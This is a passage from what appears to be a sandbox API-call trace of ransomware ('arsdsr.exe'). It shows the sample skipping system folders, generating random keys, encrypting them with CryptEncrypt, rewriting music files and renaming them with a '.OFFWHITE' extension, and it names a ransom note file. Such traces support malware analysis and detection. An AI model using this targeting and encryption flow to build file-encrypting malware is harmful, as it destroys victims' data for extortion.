lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.822] GetLastError () returned 0x0 [0134.822] GetLastError () returned 0x0 [0134.822] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x128b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.822] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.823] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x129b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.823] WriteFile (in: hFile=0x214, lpBuffer=0x5317d0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5317d0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0134.823] GetProcessHeap () returned 0x500000 [0134.823] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x127b5) returned 0x55b7c0 [0134.823] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.823] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x127b5, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x127b5, lpOverlapped=0x0) returned 1 [0134.828] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.829] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x127b5, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x127b5, lpOverlapped=0x0) returned 1 [0134.829] GetProcessHeap () returned 0x500000 [0134.829] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0134.829] CloseHandle (hObject=0x214) returned 1 [0134.832] GetProcessHeap () returned 0x500000 [0134.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.832] GetProcessHeap () returned 0x500000 [0134.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.832] GetProcessHeap () returned 0x500000 [0134.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.832] GetProcessHeap () returned 0x500000 [0134.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.832] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a" [0134.832] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a.OFFWHITE" [0134.832] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\43t09wz_fegr.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\43T09WZ_FEGR.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\43t09wz_fegr.m4a.offwhite")) returned 1 [0134.833] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8a69820, ftCreationTime.dwHighDateTime=0x1d5dd9c, ftLastAccessTime.dwLowDateTime=0x95fcb540, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0x95fcb540, ftLastWriteTime.dwHighDateTime=0x1d5da16, nFileSizeHigh=0x0, nFileSizeLow=0xf04f, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="8cowzPVWhrDOm.m4a", cAlternateFileName="8COWZP~1.M4A")) returned 1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2=".") returned 1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="..") returned 1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="...") returned 1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="windows") returned -1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="$recycle.bin") returned 1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="rsa") returned -1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="ntuser.dat") returned -1 [0134.833] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="programdata") returned -1 [0134.834] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="appdata") returned -1 [0134.834] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="program files") returned -1 [0134.834] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="program files (x86)") returned -1 [0134.834] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.834] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="8cowzPVWhrDOm.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a" [0134.834] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.834] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.834] PathFindExtensionW (pszPath="8cowzPVWhrDOm.m4a") returned=".m4a" [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.834] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.834] lstrcmpiW (lpString1="8cowzPVWhrDOm.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.834] GetProcessHeap () returned 0x500000 [0134.834] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5317e0 [0134.835] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\8cowzpvwhrdom.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0134.836] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=61519) returned 1 [0134.836] GetProcessHeap () returned 0x500000 [0134.836] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.836] GetProcessHeap () returned 0x500000 [0134.836] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.836] GetProcessHeap () returned 0x500000 [0134.836] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.836] GetProcessHeap () returned 0x500000 [0134.836] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.836] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.836] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.836] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.836] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.836] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.836] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.836] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.836] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.836] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0134.837] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.837] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.837] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0134.837] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf04f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.837] SetLastError (dwErrCode=0x0) [0134.837] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.839] GetLastError () returned 0x0 [0134.839] GetLastError () returned 0x0 [0134.839] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf14f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.839] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.839] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xf24f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.839] WriteFile (in: hFile=0x214, lpBuffer=0x5317e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5317e0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0134.839] GetProcessHeap () returned 0x500000 [0134.840] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf04f) returned 0x55b7c0 [0134.840] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.840] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xf04f, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xf04f, lpOverlapped=0x0) returned 1 [0134.844] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.844] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xf04f, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xf04f, lpOverlapped=0x0) returned 1 [0134.849] GetProcessHeap () returned 0x500000 [0134.849] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0134.849] CloseHandle (hObject=0x214) returned 1 [0134.851] GetProcessHeap () returned 0x500000 [0134.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.851] GetProcessHeap () returned 0x500000 [0134.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.851] GetProcessHeap () returned 0x500000 [0134.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.851] GetProcessHeap () returned 0x500000 [0134.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.851] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a" [0134.851] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a.OFFWHITE" [0134.851] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\8cowzpvwhrdom.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\8cowzPVWhrDOm.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\8cowzpvwhrdom.m4a.offwhite")) returned 1 [0134.852] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x889464c0, ftCreationTime.dwHighDateTime=0x1d5e6a0, ftLastAccessTime.dwLowDateTime=0xfdce5bc0, ftLastAccessTime.dwHighDateTime=0x1d5d83a, ftLastWriteTime.dwLowDateTime=0xfdce5bc0, ftLastWriteTime.dwHighDateTime=0x1d5d83a, nFileSizeHigh=0x0, nFileSizeLow=0x16e35, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="bHkPJrADYUm6TjF.m4a", cAlternateFileName="BHKPJR~1.M4A")) returned 1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2=".") returned 1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="..") returned 1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="...") returned 1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="windows") returned -1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="$recycle.bin") returned 1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="rsa") returned -1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="ntuser.dat") returned -1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="programdata") returned -1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="appdata") returned 1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="program files") returned -1 [0134.852] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="program files (x86)") returned -1 [0134.852] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.852] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="bHkPJrADYUm6TjF.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a" [0134.852] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.853] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.853] PathFindExtensionW (pszPath="bHkPJrADYUm6TjF.m4a") returned=".m4a" [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.853] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.853] lstrcmpiW (lpString1="bHkPJrADYUm6TjF.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.853] GetProcessHeap () returned 0x500000 [0134.853] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5317f0 [0134.853] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\bhkpjradyum6tjf.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0134.854] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=93749) returned 1 [0134.854] GetProcessHeap () returned 0x500000 [0134.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.854] GetProcessHeap () returned 0x500000 [0134.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.854] GetProcessHeap () returned 0x500000 [0134.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.854] GetProcessHeap () returned 0x500000 [0134.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.854] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.854] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.854] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.854] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.854] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.854] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.854] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.854] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.854] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0134.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.855] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.855] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0134.855] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x16e35, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.855] SetLastError (dwErrCode=0x0) [0134.855] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.857] GetLastError () returned 0x0 [0134.857] GetLastError () returned 0x0 [0134.857] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x16f35, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.857] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0134.858] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x17035, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.858] WriteFile (in: hFile=0x214, lpBuffer=0x5317f0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5317f0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0134.858] GetProcessHeap () returned 0x500000 [0134.858] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16e35) returned 0x55b7c0 [0134.858] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.858] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x16e35, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x16e35, lpOverlapped=0x0) returned 1 [0134.865] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.865] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x16e35, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x16e35, lpOverlapped=0x0) returned 1 [0134.865] GetProcessHeap () returned 0x500000 [0134.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0134.865] CloseHandle (hObject=0x214) returned 1 [0134.867] GetProcessHeap () returned 0x500000 [0134.867] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.867] GetProcessHeap () returned 0x500000 [0134.867] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.867] GetProcessHeap () returned 0x500000 [0134.867] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.868] GetProcessHeap () returned 0x500000 [0134.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.868] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a" [0134.868] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a.OFFWHITE" [0134.868] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\bhkpjradyum6tjf.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\bHkPJrADYUm6TjF.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\bhkpjradyum6tjf.m4a.offwhite")) returned 1 [0134.868] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37599330, ftCreationTime.dwHighDateTime=0x1d5df2c, ftLastAccessTime.dwLowDateTime=0xc57c17a0, ftLastAccessTime.dwHighDateTime=0x1d5e5d0, ftLastWriteTime.dwLowDateTime=0xc57c17a0, ftLastWriteTime.dwHighDateTime=0x1d5e5d0, nFileSizeHigh=0x0, nFileSizeLow=0x17cff, dwReserved0=0x5c005a, 